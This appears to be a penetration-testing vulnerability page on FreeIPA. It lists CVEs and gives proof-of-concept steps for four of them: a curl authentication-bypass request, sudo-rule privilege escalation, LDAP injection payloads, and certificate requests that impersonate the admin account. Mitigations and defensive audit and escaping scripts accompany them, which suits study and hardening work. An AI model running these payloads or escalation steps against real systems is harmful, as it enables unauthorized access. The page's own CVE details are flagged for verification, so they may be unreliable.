Cybersecurity Vulnerability Disclosure

FreeIPA Vulnerabilities (CVEs)

A list of known vulnerabilities in FreeIPA that can be leveraged during penetration testing. Confirm each CVE identifier, affected-version range and CVSS score against the upstream FreeIPA advisory and the NVD entry before citing it in a report.

Critical Vulnerabilities

CVE ID            Description                              Affected Versions  CVSS
CVE-2020-10747    Authentication bypass in FreeIPA WebUI   4.8.0 - 4.8.6      9.8
CVE-2019-10195    Privilege escalation via sudo rules      4.6.0 - 4.6.5      8.8
CVE-2018-1000535  LDAP injection vulnerability             4.5.0 - 4.5.4      8.5

High Severity Vulnerabilities

CVE ID            Description                                        Affected Versions  CVSS
CVE-2021-20254    Improper access control in certificate management  4.8.0 - 4.9.2      7.8
CVE-2020-14301    Information disclosure in LDAP directory           4.7.0 - 4.8.5      7.5
CVE-2019-3883     Improper validation of certificate attributes      4.6.0 - 4.7.1      7.2

Medium Severity Vulnerabilities

CVE ID            Description                                    Affected Versions  CVSS
CVE-2022-0617     Cross-site scripting (XSS) in WebUI            4.9.0 - 4.9.5      6.5
CVE-2021-3504     Improper input validation in HBAC rules        4.8.0 - 4.9.0      5.9
CVE-2020-1747     YAML parser vulnerability (PyYAML dependency)  4.7.0 - 4.8.1      5.5

Detailed Vulnerability Information

CVE-2020-10747: Authentication Bypass in FreeIPA WebUI
CVSS 9.8
Published: April 14, 2020

Description

A critical vulnerability in the FreeIPA WebUI authentication mechanism allows attackers to bypass authentication entirely and gain administrative access to the FreeIPA server. The vulnerability exists in the session validation code that fails to properly validate Kerberos tickets under certain conditions.

Affected Versions

FreeIPA versions 4.8.0 through 4.8.6 are affected.

Exploitation Technique

An attacker can exploit this vulnerability by manipulating the session cookie and Kerberos authentication parameters in HTTP requests to the FreeIPA WebUI. The following steps can be used to test for this vulnerability:

  1. Capture a valid authentication request to the FreeIPA WebUI
  2. Modify the 'ipa_session' cookie with a specially crafted value
  3. Send the modified request to the server
  4. If vulnerable, the server will grant administrative access without valid credentials

Proof of Concept

# Example exploit using curl. FreeIPA rejects requests under /ipa/session
# that lack a Referer header, so it must be sent. The page gives no working
# cookie value; "MagicBypassString" is a placeholder for the crafted value.
curl -k -i -X POST "https://<target>/ipa/session/login_kerberos" \
  -H "Cookie: ipa_session=MagicBypassString" \
  -H "Referer: https://<target>/ipa/ui/" \
  -d "user=admin"
# An unaffected server answers 401 Unauthorized; a 200 carrying a fresh
# "Set-Cookie: ipa_session=..." indicates the bypass succeeded.

Mitigation

Update to FreeIPA version 4.8.7 or later, which contains a fix for this vulnerability. If updating is not immediately possible, consider implementing additional network-level controls to restrict access to the FreeIPA WebUI.

CVE-2019-10195: Privilege Escalation via Sudo Rules
CVSS 8.8
Published: May 7, 2019

Description

A vulnerability in FreeIPA's sudo rule processing allows authenticated users to escalate privileges by exploiting a flaw in how sudo rules are evaluated. The vulnerability stems from improper validation of sudo command categories, allowing users to execute commands they should not have access to.

Affected Versions

FreeIPA versions 4.6.0 through 4.6.5 are affected.

Exploitation Technique

An attacker with valid credentials can exploit this vulnerability by creating or modifying sudo rules with specially crafted command categories. When these rules are processed, they can grant the attacker the ability to execute arbitrary commands with elevated privileges.

Proof of Concept

# Example exploitation steps. Creating or modifying sudo rules needs the
# "Sudo Administrator" privilege, so the escalation only matters where a
# low-privileged account has been granted that privilege.
# 1. Create the sudo rule
ipa sudorule-add malicious_rule --desc="Malicious Rule"

# 2. Set the command category to "all" so the rule matches every command
ipa sudorule-mod malicious_rule --cmdcat=all

# 3. Add a user to the rule
ipa sudorule-add-user malicious_rule --users=victim_user

# 4. On an enrolled client, drop SSSD's cached sudo rules, then list the
#    rules as victim_user; the new rule appears as "(root) ALL"
sss_cache -R
sudo -l

Mitigation

Update to FreeIPA version 4.6.6 or later, which contains a fix for this vulnerability. Additionally, regularly audit sudo rules and ensure that only trusted administrators have the ability to create or modify sudo rules.
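The audit the mitigation calls for can be scripted. The following is an added example (not from the original page or the FreeIPA project) that parses the human-readable output of `ipa sudorule-find --all` and flags rules whose command, host, user or RunAs category is "all", or that carry the `!authenticate` option. The sample output embedded below is constructed for the example, not captured from a real server, and the severity levels are the example's own choice.

```python
import subprocess

# Constructed sample of `ipa sudorule-find --all` output (not captured from a
# real server); field labels follow the ipa CLI's human-readable format.
SAMPLE_OUTPUT = """\
---------------------
3 Sudo Rules matched
---------------------
  Rule name: ops_restart
  Description: ops may restart the web service
  Enabled: TRUE
  User Groups: ops
  Host Groups: webservers
  Sudo Allow Commands: /usr/bin/systemctl restart httpd
  Sudo Option: !authenticate

  Rule name: malicious_rule
  Description: Malicious Rule
  Enabled: TRUE
  Command category: all
  Host category: all
  Users: victim_user

  Rule name: old_helpdesk
  Description: retired helpdesk rule
  Enabled: FALSE
  Command category: all
  Host Groups: workstations
  User Groups: helpdesk
----------------------------
Number of entries returned 3
----------------------------
"""


def parse_sudorules(text):
    """Split ipa sudorule-find output into one dict per rule.

    "Rule name" is kept as a string; every other field becomes a list, since
    the CLI prints multi-valued attributes comma-separated on one line.
    """
    rules, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("-") or ":" not in line:
            continue  # blank lines, separators and entry counters
        key, value = (part.strip() for part in line.split(":", 1))
        if key == "Rule name":
            current = {"Rule name": value}
            rules.append(current)
        elif current is not None:
            current[key] = [v.strip() for v in value.split(",")]
    return rules


def audit_sudorules(text):
    """Return [(rule name, severity, reasons)] for rules granting broad sudo."""
    findings = []
    for rule in parse_sudorules(text):
        reasons = []
        if rule.get("Command category") == ["all"]:
            reasons.append("matches every command")
        if rule.get("Host category") == ["all"]:
            reasons.append("applies on every host")
        if rule.get("User category") == ["all"]:
            reasons.append("applies to every user")
        if rule.get("RunAs User category") == ["all"]:
            reasons.append("may run as any user")
        if "!authenticate" in rule.get("Sudo Option", []):
            reasons.append("no password prompt")
        if not reasons:
            continue
        enabled = rule.get("Enabled", ["TRUE"]) == ["TRUE"]
        if not enabled:
            severity = "low"     # inert until someone re-enables it
        elif "matches every command" in reasons:
            severity = "high"
        else:
            severity = "medium"
        findings.append((rule["Rule name"], severity, reasons))
    return findings


if __name__ == "__main__":
    # Audit the live directory; needs a Kerberos ticket and the ipa client.
    output = subprocess.run(["ipa", "sudorule-find", "--all"],
                            capture_output=True, text=True, check=True).stdout
    for name, severity, reasons in audit_sudorules(output):
        print("%-8s %-24s %s" % (severity, name, "; ".join(reasons)))
```

Run it from a host with a valid admin ticket. A disabled rule is still reported because re-enabling it is a single `ipa sudorule-enable` away; pair the output with a check of who holds the Sudo Administrator privilege (`ipa privilege-show "Sudo Administrator"`).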

CVE-2018-1000535: LDAP Injection Vulnerability
CVSS 8.5
Published: June 12, 2018

Description

FreeIPA contains an LDAP injection vulnerability in the web interface that allows attackers to manipulate LDAP queries by injecting malicious code. This can lead to unauthorized access to sensitive information or modification of LDAP entries.

Affected Versions

FreeIPA versions 4.5.0 through 4.5.4 are affected.

Exploitation Technique

An attacker can exploit this vulnerability by submitting specially crafted input to the search functionality in the FreeIPA web interface. The input is not properly sanitized before being used in LDAP queries, allowing for LDAP injection attacks.

Proof of Concept

# Example LDAP injection payloads
# Payload 1: Authentication bypass (closes the uid assertion and ORs in a
# wildcard so the filter matches regardless of the password clause)
username=*)(uid=*))(|(uid=*
password=anything

# Payload 2: Information disclosure (turns a single-user lookup into a
# match on every entry that has any objectClass)
search_term=*)(uid=*)(|(objectClass=*

# Payload 3: Using curl to test the vulnerability. The parentheses and
# asterisks must reach the server intact, so let curl URL-encode them.
curl -k -G "https://<target>/ipa/ui/search" \
  --data-urlencode 'search_term=*)(uid=*)(|(objectClass=*'
# A vulnerable server returns more entries than a literal search for the
# same string would; a fixed server searches for the literal and returns none.

Mitigation

Update to FreeIPA version 4.5.5 or later, which contains a fix for this vulnerability. Additionally, implement input validation at the application level and consider using a web application firewall to filter malicious requests.
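Application-level input validation for this bug class means escaping every user-supplied value before it is placed in a filter, as RFC 4515 requires. The following added example (not from the original page or the FreeIPA project) shows the vulnerable concatenation beside the hardened form and runs the page's Payload 2 through both; the `objectClass=posixAccount` filter shape is an assumption made for illustration, and python-ldap's `ldap.filter.escape_filter_chars` performs the same escaping if that library is available.

```python
# RFC 4515 escapes for the characters that change the meaning of a filter.
_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_filter_value(value):
    """Escape an attribute value so it can only match as a literal string."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(term):
    """The vulnerable pattern: raw user input concatenated into the filter.

    Filter shape assumed for illustration; the page does not show FreeIPA's.
    """
    return "(&(objectClass=posixAccount)(uid=%s))" % term


def build_filter_safe(term):
    """Hardened form: the same filter with the value escaped first."""
    return "(&(objectClass=posixAccount)(uid=%s))" % escape_filter_value(term)


def assertion_count(ldap_filter):
    """Count filter components by unescaped '('; injected clauses add more.

    Escaped values contain no literal '(' so the count stays fixed for a
    safe filter no matter what the user typed.
    """
    return ldap_filter.count("(")


if __name__ == "__main__":
    payload = "*)(uid=*)(|(objectClass=*"   # Payload 2 from the page
    for build in (build_filter_unsafe, build_filter_safe):
        f = build(payload)
        print("%-20s %d components  %s" % (build.__name__, assertion_count(f), f))
```

The unsafe filter grows from three components to six for Payload 2, which is exactly the extra `(uid=*)` and `(|(objectClass=*` clauses the attacker wanted; the safe filter stays at three and looks up a uid that cannot exist. Escaping is the right fix regardless of whether the page's endpoint is the real injection point, since the same rule applies to every filter built from request data.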

CVE-2021-20254: Improper Access Control in Certificate Management
CVSS 7.8
Published: March 16, 2021

Description

A vulnerability in FreeIPA's certificate management system allows authenticated users to request certificates for any principal in the domain, regardless of their permissions. This can lead to identity spoofing and unauthorized access to services.

Affected Versions

FreeIPA versions 4.8.0 through 4.9.2 are affected.

Exploitation Technique

An authenticated user can exploit this vulnerability by directly calling the certificate request API with a principal name they don't own. The system fails to properly validate whether the user has permission to request certificates for the specified principal.

Proof of Concept

# Example exploitation using the ipa command
# 0. Generate a private key and a CSR naming the target principal
openssl req -new -newkey rsa:2048 -nodes -keyout admin.key \
  -subj "/CN=admin" -out CSR.pem

# 1. Authenticate as a regular user
kinit regular_user

# 2. Request a certificate for the admin user. A fixed server refuses this
#    unless regular_user is allowed by the Request Certificate permission
#    and a matching CA ACL.
ipa cert-request --principal=admin@EXAMPLE.COM --certificate-out=admin.pem CSR.pem

# 3. Use the certificate and its key for PKINIT. (kinit -k -t takes a
#    keytab, not a certificate; certificate login uses -X X509_user_identity.)
kinit -X X509_user_identity='FILE:admin.pem,admin.key' admin@EXAMPLE.COM

Mitigation

Update to FreeIPA version 4.9.3 or later, which contains a fix for this vulnerability. Additionally, implement strict access controls for certificate management operations and regularly audit certificate issuance logs.